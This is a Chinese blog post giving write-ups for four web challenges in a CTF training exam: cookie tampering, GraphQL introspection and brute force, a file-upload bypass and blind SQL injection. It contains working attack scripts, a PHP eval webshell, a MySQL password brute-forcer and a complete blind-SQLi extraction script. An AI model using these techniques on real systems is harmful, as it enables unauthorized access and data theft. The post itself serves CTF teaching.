CTF暑期集訓(xùn)-第一階段考核賽WEB題解

EASY-WEB

題目描述

圖片.png

解題過(guò)程

  1. 右鍵源代碼發(fā)現(xiàn)提示
圖片.png
  1. GET請(qǐng)求帶上參數(shù)source,得到如下:
圖片.png
  1. POST傳值name參數(shù)結(jié)果提示如下
圖片.png
  1. 根據(jù)提示抓包在cookie中修改user=admin重新發(fā)包

圖片.png

在響應(yīng)頭得到提示,經(jīng)過(guò)base64解密得到:ok ,do you know zhenxiaoyu.she is so cute,so let see zhen_xiao_yu_cute.php,根據(jù)提示訪問(wèn)zhen_xiao_yu_cute.php,結(jié)果如下:

圖片.png
  1. 審閱代碼,發(fā)現(xiàn)需要將頁(yè)面session會(huì)話中的zhenxiaoyukey完整拼接出來(lái)然后發(fā)送到zhen_xiao_yu_give_you_flag.php,通過(guò)腳本實(shí)現(xiàn)
  2. 得到一半flag和提示訪問(wèn)xiaojun.php,界面如下

根據(jù)題目提示進(jìn)行傳值后爆破,得到另一半flag,拼接flag得到完整flag

import requests
url = 'http://47.97.187.132:10001/'
session = requests.session()
def step_one():
    # zhen_xiao_yu_cute.php
    key = ''
    while 1:
        back = session.get(url + 'zhen_xiao_yu_cute.php').text
        if back[-1]=='>':
            break
        key +=back[-1]

    print("[+] key is " + key)
    print("[+] send it to zhen_xiao_yu_give_you_flag.php")

    back = session.get(url + 'zhen_xiao_yu_give_you_flag.php?key='+key,data= {'key':key})
    flag_start = back.text.find("flag")
    flag_over = back.text.find("<!-- xiao yu say:")
    flag_one = back.text[flag_start:flag_over]
    print("[+] I GET FLAG ONE is %s" % flag_one)
    return flag_one
def getxiaojunflag():
    startword = session.get(url + "xiaojun.php").text
    startword = startword[startword.find('upload')+9:startword.find('upload')+12]
    try :
        session.get(url+"xiaojun.php?try",timeout=1)
    except:
        pass
    # print(startword)
    for i in range(1000):
        filename = "/upload/" + startword + str(i).zfill(3) + '.txt'
        # print(filename)
        back = session.get(url + filename)
        if back.status_code ==200:
            print(back.text)
            break
step_one()
getxiaojunflag()

GraphQL-WEB

題目描述

題目截圖

考點(diǎn)

GraphQL安全機(jī)制

解題步驟

  1. 打開(kāi)題目發(fā)現(xiàn)只有一個(gè)輸入框,且會(huì)將信息回傳回來(lái)。
  1. 先查看源代碼
    可以發(fā)現(xiàn)信息格式為: /graphql?query={Gugugu(gugugu:"'+askinfo+'")}

3.發(fā)現(xiàn)api名字是graphql 那么先搜索一下關(guān)鍵詞

GraphQL安全指北

發(fā)現(xiàn)graphql 存在內(nèi)省自檢機(jī)制,可以直接獲取后端定義的所有接口信息 可以通過(guò)__schema查詢(xún)所有可用對(duì)象:

{
    __schema {
        types {
            name
        }
    }
}
RETURN: 
{"data":{"__schema":{"types":[{"name":"Query"},{"name":"String"},{"name":"Int"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}
圖片.png

http://127.0.0.1:8000/graphql?query={__schema{types{name}}}

通過(guò)__type查詢(xún)指定對(duì)象的所有字段:

{
  __type(name:"Query"){
    fields {
      description
      name
      type {
        name
        kind
            ofType {
              name
              kind
              description
            }
      }
    }
    }
}
RETURN 
{"data":{"__type":{"fields":[{"description":null,"name":"foo","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":null,"name":"hello_CTFER","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"GO ON // you should send key to see flag \u300ckey-type\uff1aNo\\d\\d\\d \u300d ","name":"config","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"\u4eba\u7c7b\u7684\u672c\u8d28\u662f\u4ec0\u4e48\uff1f","name":"Gugugu","type":{"name":"String","kind":"SCALAR","ofType":null}},{"description":"calculate a + b then return the result.","name":"add","type":{"name":"Int","kind":"SCALAR","ofType":null}}]}}}
圖片.png
圖片.png

http://127.0.0.1:8000/graphql?query={%20__type(name:%22Query%22){%20fields%20{%20description%20name%20type%20{%20name%20kind%20ofType%20{%20name%20kind%20description%20}%20}%20}%20}%20}

  1. 由上可知:發(fā)送一個(gè)config(key : No + 三個(gè)數(shù)字) 直接爆破即可
    http://127.0.0.1:8000/graphql?query={config(key:"No996")}

腳本如下:

#coding=utf-8
import requests
url = 'http://xx:xx'
for i in range(1000):
  payload = '{config(key:"NO' +str(i).zfill(3) +'")}'   //zfill方法用零墊串來(lái)填充左邊寬度
  back = requests.get(url +'/graphql?query='+payload ).text
  if 'flag' in back:
    print(back)
    exit()
  
#`http://127.0.0.1:8000/graphql?query={config(key:"No996")}`

簡(jiǎn)單的上傳

  1. 打開(kāi)頁(yè)面是文件上傳,查看源代碼發(fā)現(xiàn)存在前端js過(guò)濾,直接用插件繞過(guò)或者直接在bp中修改。
  1. 嘗試php2, php3, php4, php5, phps, pht, phtm, phtml,這里可以嘗試使用腳本進(jìn)行fuzz
  1. 發(fā)現(xiàn)phps、pht沒(méi)被過(guò)濾,成功上傳并給出了文件位置,訪問(wèn)發(fā)現(xiàn)pht被解析,phps無(wú)法解析,所以菜刀或者中國(guó)蟻劍連接上傳的pht文件
  1. 發(fā)現(xiàn)存在hint.txt文件,提示flag在數(shù)據(jù)庫(kù)
  1. 數(shù)據(jù)庫(kù)用戶(hù)名為root,密碼為6位數(shù)字,本地php爆破,根據(jù)回顯判斷密碼是否正確。接著連接數(shù)據(jù)庫(kù)進(jìn)行查詢(xún),然后輸出在頁(yè)面上
圖片.png
  1. 訪問(wèn)頁(yè)面查看flag
#coding=utf-8

import requests

a='1.pht'
# files = {'fupload': ('1.pht', open('1.pht', 'rb'), 'image/gif', {'Expires': '0'})}
files = {'fupload': ('1.pht', b'<?php @eval($_POST[1]);?>', 'image/gif', {'Expires': '0'})}
files = {'fupload': ('1.pht', b'''<?php
    ini_set("display_errors", "On");
    error_reporting(E_ALL);
    ini_set("display_errors", "On");  
    error_reporting(0);

    for($i=92873;$i<1000000;$i++){
        $b = ($i);
        if(strlen($b)==1){
            $t = "00000".$b;
        }else if(strlen($b)==2){
            $t = "0000".$b;
        }else if(strlen($b)==3){
            $t = "000".$b;
        }else if(strlen($b)==4){
            $t = "00".$b;
        }else if(strlen($b)==5){
            $t = "0".$b;
        }else{
            $t = $b;
        }
        $pass = $t;
        $con = mysqli_connect("localhost","root",$pass);
        if (!$con){
            continue;
        }else{
            echo $pass."connect ok!";
            $sql = "SELECT * from FLAG.flag";
$result = mysqli_query($con,$sql);

while($row = mysqli_fetch_array($result)){
    var_dump($row);
    echo '<hr>';
}

mysqli_close($db);
            
            break;
        }
    }

?>''', 'image/gif', {'Expires': '0'})}

back = requests.post('http://127.0.0.1:5002/index.php',files=files,data={'submit':'upload!'})

print(back.text)

easy-sql

  • 考點(diǎn):sql盲注
  • 腳本如下
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import requests

def length(url,findstr):
    num = 1
    while True:
        str_num = '%d' % num
        payload = "admin' and (select length(database()) = " + str_num + ")#"
        data = {'user': payload}
        response = requests.post(url, data=data)
        if findstr in response.content.decode('UTF-8'):
            return str_num
        else:
            num = num + 1

def getdata(url,findstr):
    database = ""
    for i in range(1, 7):
        for j in range(22, 123):
            payload = "admin' and ascii(mid(database(),%s,1))=%s#" % (str(i), str(j))
            data = {'user': payload}
            response = requests.post(url, data=data)
            if findstr in response.content.decode('UTF-8'):
                database = database + chr(j)
                break
            else:
                j = j + 1
    return  database

def gettable(url,findstr):
    tablename = ""
    for i in range(1, 10):
        for j in range(22, 123):
            payload = "admin' and ascii(mid((select group_concat(TABLE_NAME) from information_schema.tables where table_schema=DATABASE()),%s,1))=%s#" % (str(i), str(j))
            data = {'user': payload}
            response = requests.post(url, data=data)
            if findstr in response.content.decode('UTF-8'):
                tablename = tablename + chr(j)
                break
            else:
                j = j + 1
    return  tablename


def getcolumnname(url,findstr):
    columnname = ""
    for i in range(1, 10):
        for j in range(22, 123):
            payload = "admin' and ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='f1ag'),%s,1))=%s#" % (str(i), str(j))
            data = {'user': payload}
            response = requests.post(url, data=data)
            if findstr in response.content.decode('UTF-8'):
                columnname = columnname + chr(j)
                break
            else:
                j = j + 1
    return  columnname


def getflag(url,findstr):
    flag = ""
    for i in range(1, 32):
        for j in range(22, 128):
            payload = "admin' and ascii(mid((select fl4g from f1ag),%s,1))=%s#" % (str(i), str(j))
            data = {'user': payload}
            response = requests.post(url, data=data)
            if findstr in response.content.decode('UTF-8'):
                flag = flag + chr(j)
                break
            else:
                j = j + 1
    return  flag
url = "http://47.97.187.132:10004/index.php"
findstr = "登錄成功"

# print length(url,findstr)
#6
# print getdata(url,findstr)
#dbuser
# print gettable(url,findstr)
# print getcolumnname(url,findstr)
print getflag(url,findstr)
#flag{lekaihua_is_panghuhuh}
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • WEB2 看源代碼得flag 文件上傳測(cè)試 找一張圖片上傳,截包改后綴名為.php得flag 計(jì)算題 F12修改輸...
    a2dd56f6ad89閱讀 18,635評(píng)論 0 2
  • WEB 1、簽到題 進(jìn)入網(wǎng)頁(yè)之后只有一行字”key在哪里?”,直接右鍵,查看網(wǎng)頁(yè)源代碼, nctf{flag_ad...
    windbsy閱讀 7,779評(píng)論 0 1
  • 題目鏈接:https://cgctf.nuptsast.com/challenges#Web 簽到題 查看網(wǎng)頁(yè)源...
    a2dd56f6ad89閱讀 8,323評(píng)論 0 2
  • 5.12殷丹種子實(shí)踐 今日種子實(shí)踐: 近期目標(biāo):伴侶目標(biāo) 1 誦白字明咒懺悔往昔之邪淫罪業(yè)。種種子種的感覺(jué)好累,但...
    殷丹閱讀 137評(píng)論 0 0
  • 高考話題 距離2019年高考僅 3 天,讓我們一起來(lái)看看歷屆高考中的8大失誤,吸取經(jīng)驗(yàn),為自己高考一臂之力 每一...
    崔軍巧閱讀 176評(píng)論 0 0

友情鏈接更多精彩內(nèi)容